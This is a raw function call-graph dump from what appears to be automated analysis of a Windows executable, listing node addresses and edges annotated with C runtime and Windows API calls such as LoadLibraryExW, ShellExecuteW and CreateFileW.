104845->104852 104847->104845 104847->104848 104848->104835 104850->104838 104851->104848 104852->104845 104853->104775 104854->104776 104855->104767 104856->104783 104857->104788 104858->104799 104860 fa8dd1 104859->104860 104865 fa8c59 104860->104865 104864 fa8dec 104864->104802 104866 fa8c73 _memset __call_reportfault 104865->104866 104867 fa8c93 IsDebuggerPresent 104866->104867 104873 faa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104867->104873 104870 fa8d57 __call_reportfault 104874 fac5f6 104870->104874 104871 fa8d7a 104872 faa140 GetCurrentProcess TerminateProcess 104871->104872 104872->104864 104873->104870 104875 fac5fe 104874->104875 104876 fac600 IsProcessorFeaturePresent 104874->104876 104875->104871 104878 fb590a 104876->104878 104881 fb58b9 5 API calls 2 library calls 104878->104881 104880 fb59ed 104880->104871 104881->104880 104883 faa4d4 EncodePointer 104882->104883 104883->104883 104884 faa4ee 104883->104884 104884->104806 104886 fa9c0b __lock 58 API calls 104885->104886 104887 fa3377 DecodePointer EncodePointer 104886->104887 104950 fa9d75 LeaveCriticalSection 104887->104950 104889 f84849 104890 fa33d4 104889->104890 104891 fa33f8 104890->104891 104892 fa33de 104890->104892 104891->104815 104892->104891 104951 fa8b28 58 API calls __getptd_noexit 104892->104951 104894 fa33e8 104952 fa8db6 9 API calls __woutput_l 104894->104952 104896 fa33f3 104896->104815 104897->104817 104899 f83b47 __write_nolock 104898->104899 104900 f87667 59 API calls 104899->104900 104901 f83b51 GetCurrentDirectoryW 104900->104901 104953 f83766 104901->104953 104903 f83b7a IsDebuggerPresent 104904 f83b88 104903->104904 104905 fbd272 MessageBoxA 104903->104905 104906 f83c61 104904->104906 104907 fbd28c 104904->104907 104908 f83ba5 104904->104908 104905->104907 104909 f83c68 SetCurrentDirectoryW 104906->104909 105152 f87213 59 API calls Mailbox 104907->105152 105034 f87285 104908->105034 104912 f83c75 Mailbox 104909->104912 104912->104819 104913 fbd29c 104918 fbd2b2 SetCurrentDirectoryW 104913->104918 104915 f83bc3 GetFullPathNameW 104916 f87bcc 59 API calls 104915->104916 104917 f83bfe 104916->104917 105050 f9092d 104917->105050 104918->104912 104921 f83c1c 104922 f83c26 104921->104922 105153 fd874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104921->105153 105066 f83a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104922->105066 104925 fbd2cf 104925->104922 104928 fbd2e0 104925->104928 104929 f84706 61 API calls 104928->104929 104933 fbd2e8 104929->104933 104930 f83c30 104931 f83c43 104930->104931 104934 f8434a 68 API calls 104930->104934 105074 f909d0 104931->105074 104936 f87de1 59 API calls 104933->104936 104934->104931 104935 f83c4e 104935->104906 105151 f8443a Shell_NotifyIconW _memset 104935->105151 104937 fbd2f5 104936->104937 104939 fbd2ff 104937->104939 104940 fbd324 104937->104940 104941 f87cab 59 API calls 104939->104941 104942 f87cab 59 API calls 104940->104942 104943 fbd30a 104941->104943 104944 fbd320 GetForegroundWindow ShellExecuteW 104942->104944 104945 f87b2e 59 API calls 104943->104945 104948 fbd354 Mailbox 104944->104948 104947 fbd317 104945->104947 104949 f87cab 59 API calls 104947->104949 104948->104906 104949->104944 104950->104889 104951->104894 104952->104896 104954 f87667 59 API calls 104953->104954 104955 f8377c 104954->104955 105154 f83d31 104955->105154 104957 f8379a 104958 f84706 61 API calls 104957->104958 104959 f837ae 104958->104959 104960 f87de1 59 API calls 104959->104960 104961 f837bb 104960->104961 105168 f84ddd 104961->105168 104964 f837dc Mailbox 104969 f88047 59 API calls 104964->104969 104965 fbd173 105224 fe955b 104965->105224 104968 fbd192 104971 fa2d55 _free 58 API calls 104968->104971 104972 f837ef 104969->104972 104973 fbd19f 104971->104973 105192 f8928a 104972->105192 104975 f84e4a 84 API calls 104973->104975 104977 fbd1a8 104975->104977 104981 f83ed0 59 API calls 104977->104981 104978 f87de1 59 API calls 104979 f83808 104978->104979 105195 f884c0 104979->105195 104983 fbd1c3 104981->104983 104982 f8381a Mailbox 104984 f87de1 59 API calls 104982->104984 104985 f83ed0 59 API calls 104983->104985 104986 f83840 104984->104986 104987 fbd1df 104985->104987 104988 f884c0 69 API calls 104986->104988 104989 f84706 61 API calls 104987->104989 104991 f8384f Mailbox 104988->104991 104990 fbd204 104989->104990 104992 f83ed0 59 API calls 104990->104992 104994 f87667 59 API calls 104991->104994 104993 fbd210 104992->104993 104995 f88047 59 API calls 104993->104995 104996 f8386d 104994->104996 104997 fbd21e 104995->104997 105199 f83ed0 104996->105199 105000 f83ed0 59 API calls 104997->105000 105003 fbd22d 105000->105003 105002 f83887 105002->104977 105004 f83891 105002->105004 105007 f88047 59 API calls 105003->105007 105005 fa2efd _W_store_winword 60 API calls 105004->105005 105006 f8389c 105005->105006 105006->104983 105008 f838a6 105006->105008 105009 fbd24f 105007->105009 105010 fa2efd _W_store_winword 60 API calls 105008->105010 105011 f83ed0 59 API calls 105009->105011 105012 f838b1 105010->105012 105013 fbd25c 105011->105013 105012->104987 105014 f838bb 105012->105014 105013->105013 105015 fa2efd _W_store_winword 60 API calls 105014->105015 105016 f838c6 105015->105016 105016->105003 105017 f83907 105016->105017 105019 f83ed0 59 API calls 105016->105019 105017->105003 105018 f83914 105017->105018 105020 f892ce 59 API calls 105018->105020 105021 f838ea 105019->105021 105023 f83924 105020->105023 105022 f88047 59 API calls 105021->105022 105024 f838f8 105022->105024 105025 f89050 59 API calls 105023->105025 105026 f83ed0 59 API calls 105024->105026 105027 f83932 105025->105027 105026->105017 105215 f88ee0 105027->105215 105029 f8928a 59 API calls 105031 f8394f 105029->105031 105030 f88ee0 60 API calls 105030->105031 105031->105029 105031->105030 105032 f83ed0 59 API calls 105031->105032 105033 f83995 Mailbox 105031->105033 105032->105031 105033->104903 105035 f87292 __write_nolock 105034->105035 105036 f872ab 105035->105036 105037 fbea22 _memset 105035->105037 105038 f84750 60 API calls 105036->105038 105040 fbea3e GetOpenFileNameW 105037->105040 105039 f872b4 105038->105039 105833 fa0791 105039->105833 105042 fbea8d 105040->105042 105043 f87bcc 59 API calls 105042->105043 105045 fbeaa2 105043->105045 105045->105045 105047 f872c9 105851 f8686a 105047->105851 105051 f9093a __write_nolock 105050->105051 106079 f86d80 105051->106079 105053 f9093f 105054 f83c14 105053->105054 106090 f9119e 89 API calls 105053->106090 105054->104913 105054->104921 105056 f9094c 105056->105054 106091 f93ee7 91 API calls Mailbox 105056->106091 105058 f90955 105058->105054 105059 f90959 GetFullPathNameW 105058->105059 105060 f87bcc 59 API calls 105059->105060 105061 f90985 105060->105061 105062 f87bcc 59 API calls 105061->105062 105063 f90992 105062->105063 105064 fc4cab _wcscat 105063->105064 105065 f87bcc 59 API calls 105063->105065 105065->105054 105067 f83ab0 LoadImageW RegisterClassExW 105066->105067 105068 fbd261 105066->105068 106128 f83041 7 API calls 105067->106128 106129 f847a0 LoadImageW EnumResourceNamesW 105068->106129 105071 f83b34 105073 f839d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105071->105073 105072 fbd26a 105073->104930 105075 fc4cc3 105074->105075 105078 f909f5 105074->105078 106187 fe9e4a 89 API calls 4 library calls 105075->106187 105077 f90ce4 105079 f90cfa 105077->105079 106184 f91070 10 API calls Mailbox 105077->106184 105150 f90a05 Mailbox 105078->105150 106188 f89e5d 60 API calls 105078->106188 106189 fd6349 341 API calls 105078->106189 105079->104935 105081 f90ee4 105081->105079 105083 f90ef1 105081->105083 106185 f91093 341 API calls Mailbox 105083->106185 105084 f90a4b PeekMessageW 105084->105150 105086 f90ef8 LockWindowUpdate DestroyWindow GetMessageW 105086->105079 105089 f90f2a 105086->105089 105088 fc4e81 Sleep 105088->105150 105091 fc5c58 TranslateMessage DispatchMessageW GetMessageW 105089->105091 105091->105091 105092 fc5c88 105091->105092 105092->105079 105093 f90e43 PeekMessageW 105093->105150 105094 f90ea5 TranslateMessage DispatchMessageW 105094->105093 105095 fc4d50 TranslateAcceleratorW 105095->105093 105095->105150 105096 f90d13 timeGetTime 105096->105150 105097 fc581f WaitForSingleObject 105099 fc583c GetExitCodeProcess CloseHandle 105097->105099 105097->105150 105133 f90f95 105099->105133 105100 f90e5f Sleep 105135 f90e70 Mailbox 105100->105135 105101 f88047 59 API calls 105101->105150 105102 f87667 59 API calls 105102->105135 105104 fa0db6 59 API calls Mailbox 105104->105150 105105 fc5af8 Sleep 105105->105135 105106 f8b73c 314 API calls 105106->105150 105108 fa049f timeGetTime 105108->105135 105109 f90f4e timeGetTime 106186 f89e5d 60 API calls 105109->106186 105112 fc5b8f GetExitCodeProcess 105114 fc5bbb CloseHandle 105112->105114 105115 fc5ba5 WaitForSingleObject 105112->105115 105113 f89837 84 API calls 105113->105150 105114->105135 105115->105114 105115->105150 105118 1005f25 110 API calls 105118->105135 105119 f8b7dd 109 API calls 105119->105135 105120 f89e5d 60 API calls 105120->105150 105121 fc5874 105121->105133 105122 fc5c17 Sleep 105122->105150 105123 fc5078 Sleep 105123->105150 105125 f87de1 59 API calls 105125->105135 105133->104935 105135->105102 105135->105108 105135->105112 105135->105118 105135->105119 105135->105121 105135->105122 105135->105123 105135->105125 105135->105133 105135->105150 106196 fe2408 60 API calls 105135->106196 106197 f89e5d 60 API calls 105135->106197 106198 f889b3 69 API calls Mailbox 105135->106198 106199 f8b73c 341 API calls 105135->106199 106200 fd64da 60 API calls 105135->106200 106201 fe5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105135->106201 106202 fe3c55 66 API calls Mailbox 105135->106202 105136 fe9e4a 89 API calls 105136->105150 105138 f89c90 59 API calls Mailbox 105138->105150 105139 f89ea0 314 API calls 105139->105150 105140 f884c0 69 API calls 105140->105150 105142 fd617e 59 API calls Mailbox 105142->105150 105143 fc55d5 VariantClear 105143->105150 105144 f88cd4 59 API calls Mailbox 105144->105150 105145 fc566b VariantClear 105145->105150 105146 fc5419 VariantClear 105146->105150 105147 fd6e8f 59 API calls 105147->105150 105148 f87de1 59 API calls 105148->105150 105149 f889b3 69 API calls 105149->105150 105150->105077 105150->105084 105150->105088 105150->105093 105150->105094 105150->105095 105150->105096 105150->105097 105150->105100 105150->105101 105150->105104 105150->105105 105150->105106 105150->105109 105150->105113 105150->105120 105150->105133 105150->105135 105150->105136 105150->105138 105150->105139 105150->105140 105150->105142 105150->105143 105150->105144 105150->105145 105150->105146 105150->105147 105150->105148 105150->105149 106130 f8e6a0 105150->106130 106161 f8f460 105150->106161 106181 f8e420 341 API calls 105150->106181 106182 f8fce0 341 API calls 2 library calls 105150->106182 106183 f831ce IsDialogMessageW GetClassLongW 105150->106183 106190 1006018 59 API calls 105150->106190 106191 fe9a15 59 API calls Mailbox 105150->106191 106192 fdd4f2 59 API calls 105150->106192 106193 fd60ef 59 API calls 2 library calls 105150->106193 106194 f88401 59 API calls 105150->106194 106195 f882df 59 API calls Mailbox 105150->106195 105151->104906 105152->104913 105153->104925 105155 f83d3e __write_nolock 105154->105155 105156 f87bcc 59 API calls 105155->105156 105161 f83ea4 Mailbox 105155->105161 105158 f83d70 105156->105158 105164 f83da6 Mailbox 105158->105164 105265 f879f2 105158->105265 105159 f83e77 105160 f87de1 59 API calls 105159->105160 105159->105161 105163 f83e98 105160->105163 105161->104957 105162 f87de1 59 API calls 105162->105164 105165 f83f74 59 API calls 105163->105165 105164->105159 105164->105161 105164->105162 105166 f83f74 59 API calls 105164->105166 105167 f879f2 59 API calls 105164->105167 105165->105161 105166->105164 105167->105164 105268 f84bb5 105168->105268 105173 f84e08 LoadLibraryExW 105278 f84b6a 105173->105278 105174 fbd8e6 105175 f84e4a 84 API calls 105174->105175 105177 fbd8ed 105175->105177 105179 f84b6a 3 API calls 105177->105179 105181 fbd8f5 105179->105181 105304 f84f0b 105181->105304 105182 f84e2f 105182->105181 105183 f84e3b 105182->105183 105185 f84e4a 84 API calls 105183->105185 105187 f837d4 105185->105187 105187->104964 105187->104965 105189 fbd91c 105312 f84ec7 105189->105312 105191 fbd929 105193 fa0db6 Mailbox 59 API calls 105192->105193 105194 f837fb 105193->105194 105194->104978 105196 f884cb 105195->105196 105198 f884f2 105196->105198 105563 f889b3 69 API calls Mailbox 105196->105563 105198->104982 105200 f83eda 105199->105200 105201 f83ef3 105199->105201 105202 f88047 59 API calls 105200->105202 105203 f87bcc 59 API calls 105201->105203 105204 f83879 105202->105204 105203->105204 105205 fa2efd 105204->105205 105206 fa2f09 105205->105206 105207 fa2f7e 105205->105207 105211 fa2f2e 105206->105211 105564 fa8b28 58 API calls __getptd_noexit 105206->105564 105566 fa2f90 60 API calls 3 library calls 105207->105566 105210 fa2f8b 105210->105002 105211->105002 105212 fa2f15 105565 fa8db6 9 API calls __woutput_l 105212->105565 105214 fa2f20 105214->105002 105216 fbf17c 105215->105216 105218 f88ef7 105215->105218 105216->105218 105568 f88bdb 59 API calls Mailbox 105216->105568 105219 f88ff8 105218->105219 105220 f89040 105218->105220 105223 f88fff 105218->105223 105222 fa0db6 Mailbox 59 API calls 105219->105222 105567 f89d3c 60 API calls Mailbox 105220->105567 105222->105223 105223->105031 105225 f84ee5 85 API calls 105224->105225 105226 fe95ca 105225->105226 105569 fe9734 105226->105569 105229 f84f0b 74 API calls 105230 fe95f7 105229->105230 105231 f84f0b 74 API calls 105230->105231 105232 fe9607 105231->105232 105233 f84f0b 74 API calls 105232->105233 105234 fe9622 105233->105234 105235 f84f0b 74 API calls 105234->105235 105236 fe963d 105235->105236 105237 f84ee5 85 API calls 105236->105237 105238 fe9654 105237->105238 105239 fa571c std::exception::_Copy_str 58 API calls 105238->105239 105240 fe965b 105239->105240 105241 fa571c std::exception::_Copy_str 58 API calls 105240->105241 105242 fe9665 105241->105242 105243 f84f0b 74 API calls 105242->105243 105244 fe9679 105243->105244 105245 fe9109 GetSystemTimeAsFileTime 105244->105245 105246 fe968c 105245->105246 105247 fe96b6 105246->105247 105248 fe96a1 105246->105248 105250 fe96bc 105247->105250 105251 fe971b 105247->105251 105249 fa2d55 _free 58 API calls 105248->105249 105252 fe96a7 105249->105252 105575 fe8b06 116 API calls __fcloseall 105250->105575 105254 fa2d55 _free 58 API calls 105251->105254 105255 fa2d55 _free 58 API calls 105252->105255 105257 fbd186 105254->105257 105255->105257 105256 fe9713 105258 fa2d55 _free 58 API calls 105256->105258 105257->104968 105259 f84e4a 105257->105259 105258->105257 105260 f84e5b 105259->105260 105261 f84e54 105259->105261 105263 f84e6a 105260->105263 105264 f84e7b FreeLibrary 105260->105264 105576 fa53a6 105261->105576 105263->104968 105264->105263 105266 f87e4f 59 API calls 105265->105266 105267 f879fd 105266->105267 105267->105158 105317 f84c03 105268->105317 105271 f84bdc 105273 f84bec FreeLibrary 105271->105273 105274 f84bf5 105271->105274 105272 f84c03 2 API calls 105272->105271 105273->105274 105275 fa525b 105274->105275 105321 fa5270 105275->105321 105277 f84dfc 105277->105173 105277->105174 105481 f84c36 105278->105481 105281 f84c36 2 API calls 105284 f84b8f 105281->105284 105282 f84baa 105285 f84c70 105282->105285 105283 f84ba1 FreeLibrary 105283->105282 105284->105282 105284->105283 105286 fa0db6 Mailbox 59 API calls 105285->105286 105287 f84c85 105286->105287 105288 f8522e 59 API calls 105287->105288 105289 f84c91 _memmove 105288->105289 105290 f84ccc 105289->105290 105291 f84d89 105289->105291 105292 f84dc1 105289->105292 105293 f84ec7 69 API calls 105290->105293 105485 f84e89 CreateStreamOnHGlobal 105291->105485 105496 fe991b 95 API calls 105292->105496 105299 f84cd5 105293->105299 105296 f84f0b 74 API calls 105296->105299 105297 f84d69 105297->105182 105299->105296 105299->105297 105300 fbd8a7 105299->105300 105491 f84ee5 105299->105491 105301 f84ee5 85 API calls 105300->105301 105302 fbd8bb 105301->105302 105303 f84f0b 74 API calls 105302->105303 105303->105297 105305 f84f1d 105304->105305 105306 fbd9cd 105304->105306 105520 fa55e2 105305->105520 105309 fe9109 105540 fe8f5f 105309->105540 105311 fe911f 105311->105189 105313 fbd990 105312->105313 105314 f84ed6 105312->105314 105545 fa5c60 105314->105545 105316 f84ede 105316->105191 105318 f84bd0 105317->105318 105319 f84c0c LoadLibraryA 105317->105319 105318->105271 105318->105272 105319->105318 105320 f84c1d GetProcAddress 105319->105320 105320->105318 105324 fa527c __tzset_nolock 105321->105324 105322 fa528f 105370 fa8b28 58 API calls __getptd_noexit 105322->105370 105324->105322 105325 fa52c0 105324->105325 105340 fb04e8 105325->105340 105326 fa5294 105371 fa8db6 9 API calls __woutput_l 105326->105371 105329 fa52c5 105330 fa52db 105329->105330 105331 fa52ce 105329->105331 105333 fa5305 105330->105333 105334 fa52e5 105330->105334 105372 fa8b28 58 API calls __getptd_noexit 105331->105372 105355 fb0607 105333->105355 105373 fa8b28 58 API calls __getptd_noexit 105334->105373 105335 fa529f __tzset_nolock @_EH4_CallFilterFunc@8 105335->105277 105341 fb04f4 __tzset_nolock 105340->105341 105342 fa9c0b __lock 58 API calls 105341->105342 105352 fb0502 105342->105352 105343 fb0576 105375 fb05fe 105343->105375 105344 fb057d 105380 fa881d 58 API calls 2 library calls 105344->105380 105347 fb05f3 __tzset_nolock 105347->105329 105348 fb0584 105348->105343 105381 fa9e2b InitializeCriticalSectionAndSpinCount 105348->105381 105351 fa9c93 __mtinitlocknum 58 API calls 105351->105352 105352->105343 105352->105344 105352->105351 105378 fa6c50 59 API calls __lock 105352->105378 105379 fa6cba LeaveCriticalSection LeaveCriticalSection _doexit 105352->105379 105353 fb05aa EnterCriticalSection 105353->105343 105364 fb0627 __wopenfile 105355->105364 105356 fb0641 105386 fa8b28 58 API calls __getptd_noexit 105356->105386 105358 fb07fc 105358->105356 105362 fb085f 105358->105362 105359 fb0646 105387 fa8db6 9 API calls __woutput_l 105359->105387 105361 fa5310 105374 fa5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105361->105374 105383 fb85a1 105362->105383 105364->105356 105364->105358 105364->105364 105388 fa37cb 60 API calls 2 library calls 105364->105388 105366 fb07f5 105366->105358 105389 fa37cb 60 API calls 2 library calls 105366->105389 105368 fb0814 105368->105358 105390 fa37cb 60 API calls 2 library calls 105368->105390 105370->105326 105371->105335 105372->105335 105373->105335 105374->105335 105382 fa9d75 LeaveCriticalSection 105375->105382 105377 fb0605 105377->105347 105378->105352 105379->105352 105380->105348 105381->105353 105382->105377 105391 fb7d85 105383->105391 105385 fb85ba 105385->105361 105386->105359 105387->105361 105388->105366 105389->105368 105390->105358 105394 fb7d91 __tzset_nolock 105391->105394 105392 fb7da7 105478 fa8b28 58 API calls __getptd_noexit 105392->105478 105394->105392 105396 fb7ddd 105394->105396 105395 fb7dac 105479 fa8db6 9 API calls __woutput_l 105395->105479 105402 fb7e4e 105396->105402 105399 fb7df9 105480 fb7e22 LeaveCriticalSection __unlock_fhandle 105399->105480 105401 fb7db6 __tzset_nolock 105401->105385 105403 fb7e6e 105402->105403 105404 fa44ea __wsopen_nolock 58 API calls 105403->105404 105408 fb7e8a 105404->105408 105405 fb7fc1 105406 fa8dc6 __invoke_watson 8 API calls 105405->105406 105407 fb85a0 105406->105407 105410 fb7d85 __wsopen_helper 103 API calls 105407->105410 105408->105405 105409 fb7ec4 105408->105409 105417 fb7ee7 105408->105417 105411 fa8af4 __close 58 API calls 105409->105411 105412 fb85ba 105410->105412 105413 fb7ec9 105411->105413 105412->105399 105414 fa8b28 __woutput_l 58 API calls 105413->105414 105415 fb7ed6 105414->105415 105418 fa8db6 __woutput_l 9 API calls 105415->105418 105416 fb7fa5 105419 fa8af4 __close 58 API calls 105416->105419 105417->105416 105424 fb7f83 105417->105424 105420 fb7ee0 105418->105420 105421 fb7faa 105419->105421 105420->105399 105422 fa8b28 __woutput_l 58 API calls 105421->105422 105423 fb7fb7 105422->105423 105425 fa8db6 __woutput_l 9 API calls 105423->105425 105426 fad294 __alloc_osfhnd 61 API calls 105424->105426 105425->105405 105427 fb8051 105426->105427 105428 fb805b 105427->105428 105429 fb807e 105427->105429 105430 fa8af4 __close 58 API calls 105428->105430 105431 fb7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105429->105431 105432 fb8060 105430->105432 105442 fb80a0 105431->105442 105433 fa8b28 __woutput_l 58 API calls 105432->105433 105435 fb806a 105433->105435 105434 fb811e GetFileType 105436 fb816b 105434->105436 105437 fb8129 GetLastError 105434->105437 105440 fa8b28 __woutput_l 58 API calls 105435->105440 105446 fad52a __set_osfhnd 59 API calls 105436->105446 105441 fa8b07 __dosmaperr 58 API calls 105437->105441 105438 fb80ec GetLastError 105439 fa8b07 __dosmaperr 58 API calls 105438->105439 105443 fb8111 105439->105443 105440->105420 105444 fb8150 CloseHandle 105441->105444 105442->105434 105442->105438 105445 fb7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105442->105445 105449 fa8b28 __woutput_l 58 API calls 105443->105449 105444->105443 105447 fb815e 105444->105447 105448 fb80e1 105445->105448 105453 fb8189 105446->105453 105450 fa8b28 __woutput_l 58 API calls 105447->105450 105448->105434 105448->105438 105449->105405 105451 fb8163 105450->105451 105451->105443 105452 fb8344 105452->105405 105455 fb8517 CloseHandle 105452->105455 105453->105452 105454 fb18c1 __lseeki64_nolock 60 API calls 105453->105454 105469 fb820a 105453->105469 105456 fb81f3 105454->105456 105457 fb7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105455->105457 105459 fa8af4 __close 58 API calls 105456->105459 105475 fb8212 105456->105475 105458 fb853e 105457->105458 105460 fb83ce 105458->105460 105461 fb8546 GetLastError 105458->105461 105459->105469 105460->105405 105462 fa8b07 __dosmaperr 58 API calls 105461->105462 105463 fb8552 105462->105463 105467 fad43d __free_osfhnd 59 API calls 105463->105467 105464 fb0e5b 70 API calls __read_nolock 105464->105475 105465 fb0add __close_nolock 61 API calls 105465->105475 105466 fb97a2 __chsize_nolock 82 API calls 105466->105475 105467->105460 105468 fad886 __write 78 API calls 105468->105469 105469->105452 105469->105468 105472 fb18c1 60 API calls __lseeki64_nolock 105469->105472 105469->105475 105470 fb83c1 105473 fb0add __close_nolock 61 API calls 105470->105473 105471 fb83aa 105471->105452 105472->105469 105474 fb83c8 105473->105474 105477 fa8b28 __woutput_l 58 API calls 105474->105477 105475->105464 105475->105465 105475->105466 105475->105469 105475->105470 105475->105471 105476 fb18c1 60 API calls __lseeki64_nolock 105475->105476 105476->105475 105477->105460 105478->105395 105479->105401 105480->105401 105482 f84b83 105481->105482 105483 f84c3f LoadLibraryA 105481->105483 105482->105281 105482->105284 105483->105482 105484 f84c50 GetProcAddress 105483->105484 105484->105482 105486 f84ea3 FindResourceExW 105485->105486 105490 f84ec0 105485->105490 105487 fbd933 LoadResource 105486->105487 105486->105490 105488 fbd948 SizeofResource 105487->105488 105487->105490 105489 fbd95c LockResource 105488->105489 105488->105490 105489->105490 105490->105290 105492 f84ef4 105491->105492 105495 fbd9ab 105491->105495 105497 fa584d 105492->105497 105494 f84f02 105494->105299 105496->105290 105501 fa5859 __tzset_nolock 105497->105501 105498 fa586b 105510 fa8b28 58 API calls __getptd_noexit 105498->105510 105500 fa5891 105512 fa6c11 105500->105512 105501->105498 105501->105500 105502 fa5870 105511 fa8db6 9 API calls __woutput_l 105502->105511 105505 fa5897 105518 fa57be 83 API calls 5 library calls 105505->105518 105506 fa587b __tzset_nolock 105506->105494 105508 fa58a6 105519 fa58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105508->105519 105510->105502 105511->105506 105513 fa6c43 EnterCriticalSection 105512->105513 105514 fa6c21 105512->105514 105516 fa6c39 105513->105516 105514->105513 105515 fa6c29 105514->105515 105517 fa9c0b __lock 58 API calls 105515->105517 105516->105505 105517->105516 105518->105508 105519->105506 105523 fa55fd 105520->105523 105522 f84f2e 105522->105309 105524 fa5609 __tzset_nolock 105523->105524 105525 fa561f _memset 105524->105525 105526 fa564c 105524->105526 105535 fa5644 __tzset_nolock 105524->105535 105536 fa8b28 58 API calls __getptd_noexit 105525->105536 105527 fa6c11 __lock_file 59 API calls 105526->105527 105528 fa5652 105527->105528 105538 fa541d 72 API calls 6 library calls 105528->105538 105531 fa5639 105537 fa8db6 9 API calls __woutput_l 105531->105537 105532 fa5668 105539 fa5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105532->105539 105535->105522 105536->105531 105537->105535 105538->105532 105539->105535 105543 fa520a GetSystemTimeAsFileTime 105540->105543 105542 fe8f6e 105542->105311 105544 fa5238 __aulldiv 105543->105544 105544->105542 105546 fa5c6c __tzset_nolock 105545->105546 105547 fa5c7e 105546->105547 105548 fa5c93 105546->105548 105559 fa8b28 58 API calls __getptd_noexit 105547->105559 105550 fa6c11 __lock_file 59 API calls 105548->105550 105552 fa5c99 105550->105552 105551 fa5c83 105560 fa8db6 9 API calls __woutput_l 105551->105560 105561 fa58d0 67 API calls 5 library calls 105552->105561 105555 fa5c8e __tzset_nolock 105555->105316 105556 fa5ca4 105562 fa5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105556->105562 105558 fa5cb6 105558->105555 105559->105551 105560->105555 105561->105556 105562->105558 105563->105198 105564->105212 105565->105214 105566->105210 105567->105223 105568->105218 105571 fe9748 __tzset_nolock _wcscmp 105569->105571 105570 f84f0b 74 API calls 105570->105571 105571->105570 105572 fe9109 GetSystemTimeAsFileTime 105571->105572 105573 fe95dc 105571->105573 105574 f84ee5 85 API calls 105571->105574 105572->105571 105573->105229 105573->105257 105574->105571 105575->105256 105577 fa53b2 __tzset_nolock 105576->105577 105578 fa53de 105577->105578 105579 fa53c6 105577->105579 105581 fa6c11 __lock_file 59 API calls 105578->105581 105585 fa53d6 __tzset_nolock 105578->105585 105605 fa8b28 58 API calls __getptd_noexit 105579->105605 105583 fa53f0 105581->105583 105582 fa53cb 105606 fa8db6 9 API calls __woutput_l 105582->105606 105589 fa533a 105583->105589 105585->105260 105590 fa5349 105589->105590 105591 fa535d 105589->105591 105651 fa8b28 58 API calls __getptd_noexit 105590->105651 105603 fa5359 105591->105603 105608 fa4a3d 105591->105608 105593 fa534e 105652 fa8db6 9 API calls __woutput_l 105593->105652 105600 fa5377 105625 fb0a02 105600->105625 105602 fa537d 105602->105603 105604 fa2d55 _free 58 API calls 105602->105604 105607 fa5415 LeaveCriticalSection LeaveCriticalSection _fprintf 105603->105607 105604->105603 105605->105582 105606->105585 105607->105585 105609 fa4a50 105608->105609 105613 fa4a74 105608->105613 105610 fa46e6 __output_l 58 API calls 105609->105610 105609->105613 105611 fa4a6d 105610->105611 105653 fad886 105611->105653 105614 fb0b77 105613->105614 105615 fa5371 105614->105615 105616 fb0b84 105614->105616 105618 fa46e6 105615->105618 105616->105615 105617 fa2d55 _free 58 API calls 105616->105617 105617->105615 105619 fa46f0 105618->105619 105620 fa4705 105618->105620 105788 fa8b28 58 API calls __getptd_noexit 105619->105788 105620->105600 105622 fa46f5 105789 fa8db6 9 API calls __woutput_l 105622->105789 105624 fa4700 105624->105600 105626 fb0a0e __tzset_nolock 105625->105626 105627 fb0a1b 105626->105627 105628 fb0a32 105626->105628 105805 fa8af4 58 API calls __getptd_noexit 105627->105805 105630 fb0abd 105628->105630 105632 fb0a42 105628->105632 105810 fa8af4 58 API calls __getptd_noexit 105630->105810 105631 fb0a20 105806 fa8b28 58 API calls __getptd_noexit 105631->105806 105635 fb0a6a 105632->105635 105636 fb0a60 105632->105636 105639 fad206 ___lock_fhandle 59 API calls 105635->105639 105807 fa8af4 58 API calls __getptd_noexit 105636->105807 105638 fb0a65 105811 fa8b28 58 API calls __getptd_noexit 105638->105811 105641 fb0a70 105639->105641 105643 fb0a8e 105641->105643 105644 fb0a83 105641->105644 105642 fb0ac9 105812 fa8db6 9 API calls __woutput_l 105642->105812 105808 fa8b28 58 API calls __getptd_noexit 105643->105808 105790 fb0add 105644->105790 105648 fb0a89 105809 fb0ab5 LeaveCriticalSection __unlock_fhandle 105648->105809 105649 fb0a27 __tzset_nolock 105649->105602 105651->105593 105652->105603 105654 fad892 __tzset_nolock 105653->105654 105655 fad89f 105654->105655 105656 fad8b6 105654->105656 105754 fa8af4 58 API calls __getptd_noexit 105655->105754 105658 fad955 105656->105658 105661 fad8ca 105656->105661 105760 fa8af4 58 API calls __getptd_noexit 105658->105760 105660 fad8a4 105755 fa8b28 58 API calls __getptd_noexit 105660->105755 105662 fad8e8 105661->105662 105663 fad8f2 105661->105663 105756 fa8af4 58 API calls __getptd_noexit 105662->105756 105681 fad206 105663->105681 105664 fad8ed 105761 fa8b28 58 API calls __getptd_noexit 105664->105761 105668 fad8f8 105670 fad90b 105668->105670 105671 fad91e 105668->105671 105690 fad975 105670->105690 105757 fa8b28 58 API calls __getptd_noexit 105671->105757 105672 fad961 105762 fa8db6 9 API calls __woutput_l 105672->105762 105676 fad8ab __tzset_nolock 105676->105613 105677 fad917 105759 fad94d LeaveCriticalSection __unlock_fhandle 105677->105759 105678 fad923 105758 fa8af4 58 API calls __getptd_noexit 105678->105758 105682 fad212 __tzset_nolock 105681->105682 105683 fad261 EnterCriticalSection 105682->105683 105685 fa9c0b __lock 58 API calls 105682->105685 105684 fad287 __tzset_nolock 105683->105684 105684->105668 105686 fad237 105685->105686 105687 fad24f 105686->105687 105763 fa9e2b InitializeCriticalSectionAndSpinCount 105686->105763 105764 fad28b LeaveCriticalSection _doexit 105687->105764 105691 fad982 __write_nolock 105690->105691 105692 fad9b6 105691->105692 105693 fad9e0 105691->105693 105694 fad9c1 105691->105694 105695 fac5f6 __woutput_l 6 API calls 105692->105695 105697 fada38 105693->105697 105698 fada1c 105693->105698 105774 fa8af4 58 API calls __getptd_noexit 105694->105774 105699 fae1d6 105695->105699 105702 fada51 105697->105702 105780 fb18c1 60 API calls 3 library calls 105697->105780 105777 fa8af4 58 API calls __getptd_noexit 105698->105777 105699->105677 105700 fad9c6 